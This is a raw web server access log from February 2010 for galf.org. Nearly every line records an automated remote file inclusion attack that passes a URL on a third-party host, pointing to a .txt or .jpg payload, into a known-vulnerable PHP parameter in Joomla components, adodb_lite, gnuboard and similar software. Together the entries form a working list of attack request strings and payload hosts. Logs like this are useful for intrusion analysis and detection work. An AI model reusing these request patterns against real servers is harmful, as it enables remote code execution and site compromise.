221.143.40.35 - - [08/Feb/2010:01:48:45 -0800] "GET /logs/access_090720.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:48:46 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:50:00 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:50:00 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:50:02 -0800] "GET /logs/access_090727.log//faqsupport/samplefaqsupport.php?path[docroot]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:50:19 -0800] "GET /logs/access_090720.log//faqsupport/samplefaqsupport.php?path[docroot]=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:50:40 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:50:40 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:01:50:45 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:51:10 -0800] "GET /logs/access_090727.log//faqsupport/samplefaqsupport.php?path[docroot]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:52:28 -0800] "GET /logs/access_090727.log//faqsupport/samplefaqsupport.php?path[docroot]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:52:28 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:52:28 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [08/Feb/2010:01:52:46 -0800] "GET /logs/access_091012.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:52:52 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [08/Feb/2010:01:54:40 -0800] "GET /logs/access_091012.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [08/Feb/2010:01:54:40 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:57:13 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:57:13 -0800] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:57:13 -0800] "GET /logs/access_090720.log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.37.203 - - [08/Feb/2010:01:57:17 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:57:40 -0800] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:57:52 -0800] "GET /logs/access_100201.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.37.203 - - [08/Feb/2010:01:58:27 -0800] "GET /cendoc/ HTTP/1.1" 200 526 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:59:01 -0800] "GET /logs/access_091228.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:59:01 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 1051 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:59:01 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:59:47 -0800] "GET /logs/access_091228.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.19.177.19 - - [08/Feb/2010:02:01:53 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
193.19.177.19 - - [08/Feb/2010:02:01:53 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.172.33.230 - - [08/Feb/2010:02:02:30 -0800] "GET /logs/access_091012.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:02:02:39 -0800] "GET /logs/access_091228.log//////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:02:03:04 -0800] "GET /logs/access_091228.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [08/Feb/2010:02:03:12 -0800] "GET /citywriter/head.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.163.202.84 - - [08/Feb/2010:02:03:12 -0800] "GET /logs//citywriter/head.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.163.202.84 - - [08/Feb/2010:02:03:12 -0800] "GET /logs/access.log%20%20//citywriter/head.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.250.124.252 - - [08/Feb/2010:02:03:16 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.250.124.252 - - [08/Feb/2010:02:03:16 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.250.124.252 - - [08/Feb/2010:02:03:16 -0800] "GET /logs/access_090803.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.250.124.252 - - [08/Feb/2010:02:03:16 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:02:03:27 -0800] "GET /logs/access.log%20%20//citywriter/head.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.176.226.164 - - [08/Feb/2010:02:03:27 -0800] "GET /logs//citywriter/head.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.176.226.164 - - [08/Feb/2010:02:03:27 -0800] "GET /citywriter/head.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
110.45.145.178 - - [08/Feb/2010:02:03:47 -0800] "GET /bbs/skin/ggambo7002_board/setup.php//skin/ggambo7002_board/write.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
110.45.145.178 - - [08/Feb/2010:02:03:47 -0800] "GET /logs/access.log%20%20//bbs/skin/ggambo7002_board/setup.php//skin/ggambo7002_board/write.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
110.45.145.178 - - [08/Feb/2010:02:03:47 -0800] "GET /logs//bbs/skin/ggambo7002_board/setup.php//skin/ggambo7002_board/write.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [08/Feb/2010:02:04:15 -0800] "GET /logs//citywriter/head.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [08/Feb/2010:02:04:15 -0800] "GET /citywriter/head.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [08/Feb/2010:02:04:15 -0800] "GET /logs/access.log%20%20//citywriter/head.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.176.226.164 - - [08/Feb/2010:02:04:26 -0800] "GET /logs/access.log//citywriter/head.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.176.226.164 - - [08/Feb/2010:02:04:26 -0800] "GET /logs//citywriter/head.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.176.226.164 - - [08/Feb/2010:02:04:26 -0800] "GET /citywriter/head.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.163.202.84 - - [08/Feb/2010:02:04:48 -0800] "GET /logs//citywriter/head.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.163.202.84 - - [08/Feb/2010:02:04:48 -0800] "GET /citywriter/head.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.163.202.84 - - [08/Feb/2010:02:04:51 -0800] "GET /logs/access.log//citywriter/head.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.235.54.152 - - [08/Feb/2010:02:05:04 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cmhaniagara.ca/video/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:02:06:07 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 1051 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:02:06:08 -0800] "GET /logs/access_091228.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:02:06:08 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:02:06:56 -0800] "GET /logs/access_090713.log%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:02:06:56 -0800] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:02:06:56 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [08/Feb/2010:02:07:02 -0800] "GET /logs///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
110.45.145.178 - - [08/Feb/2010:02:07:02 -0800] "GET //skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
110.45.145.178 - - [08/Feb/2010:02:07:02 -0800] "GET /logs/access.log%20%20///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [08/Feb/2010:02:07:02 -0800] "GET /citywriter/head.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [08/Feb/2010:02:07:02 -0800] "GET /logs/access.log//citywriter/head.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [08/Feb/2010:02:07:02 -0800] "GET /logs//citywriter/head.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.19.177.19 - - [08/Feb/2010:02:07:19 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.19.177.19 - - [08/Feb/2010:02:07:19 -0800] "GET /logs/access_090914.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.19.177.19 - - [08/Feb/2010:02:07:19 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.149.110.210 - - [08/Feb/2010:02:07:36 -0800] "GET /logs/access.log%20%20/tail.php?g4[path]=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.149.110.210 - - [08/Feb/2010:02:07:36 -0800] "GET /tail.php?g4[path]=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.149.110.210 - - [08/Feb/2010:02:07:36 -0800] "GET /logs/tail.php?g4[path]=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.149.110.210 - - [08/Feb/2010:02:07:43 -0800] "GET /logs/access_100201.log%20%20/tail.php?g4[path]=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:02:08:54 -0800] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_admin_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:02:08:54 -0800] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_admin_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:02:08:54 -0800] "GET /logs/access_100201.log%20%20//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_admin_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:02:08:55 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:02:08:55 -0800] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:02:08:55 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:02:10:09 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:02:10:09 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:02:10:09 -0800] "GET /logs/access_090803.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:02:10:12 -0800] "GET /logs/access_091228.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:02:10:18 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [08/Feb/2010:02:10:18 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:02:10:18 -0800] "GET /logs/access_090803.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:02:10:18 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:02:10:18 -0800] "GET /logs/access_091228.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [08/Feb/2010:02:10:18 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [08/Feb/2010:02:10:18 -0800] "GET /logs/access_090803.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [08/Feb/2010:02:10:18 -0800] "GET /logs/access_091228.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:02:10:20 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:02:10:20 -0800] "GET /logs/access_091228.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:02:10:20 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:02:10:20 -0800] "GET /logs/access_090803.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:02:10:23 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:02:10:23 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:02:10:23 -0800] "GET /logs/access_090803.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:02:10:23 -0800] "GET /logs/access_091228.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.60 - - [08/Feb/2010:02:11:34 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
110.45.145.60 - - [08/Feb/2010:02:11:34 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:02:11:44 -0800] "GET /logs/access_100201.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:02:11:54 -0800] "GET /logs/access_091130.log//////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:02:12:20 -0800] "GET /logs/access_091228.log//////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [08/Feb/2010:02:12:24 -0800] "GET /logs/access.log//bbs/skin/ggambo7002_board/setup.php//skin/ggambo7002_board/write.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
210.116.103.118 - - [08/Feb/2010:02:12:33 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cmhaniagara.ca/video/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.116.103.118 - - [08/Feb/2010:02:12:33 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cmhaniagara.ca/video/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.116.103.118 - - [08/Feb/2010:02:12:35 -0800] "GET /logs/access_090803.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cmhaniagara.ca/video/baner.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.116.103.118 - - [08/Feb/2010:02:12:35 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cmhaniagara.ca/video/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.19.177.19 - - [08/Feb/2010:02:13:08 -0800] "GET /logs/access_090914.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [08/Feb/2010:02:13:28 -0800] "GET /logs/access_091012.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cmhaniagara.ca/video/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.60 - - [08/Feb/2010:02:13:48 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.60 - - [08/Feb/2010:02:13:48 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.60 - - [08/Feb/2010:02:13:48 -0800] "GET /logs/access_090914.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.19.177.19 - - [08/Feb/2010:02:13:51 -0800] "GET /logs/access_090817.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.103.128.44 - - [08/Feb/2010:02:14:38 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.103.128.44 - - [08/Feb/2010:02:14:38 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.103.128.44 - - [08/Feb/2010:02:14:38 -0800] "GET /logs/access_100118.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
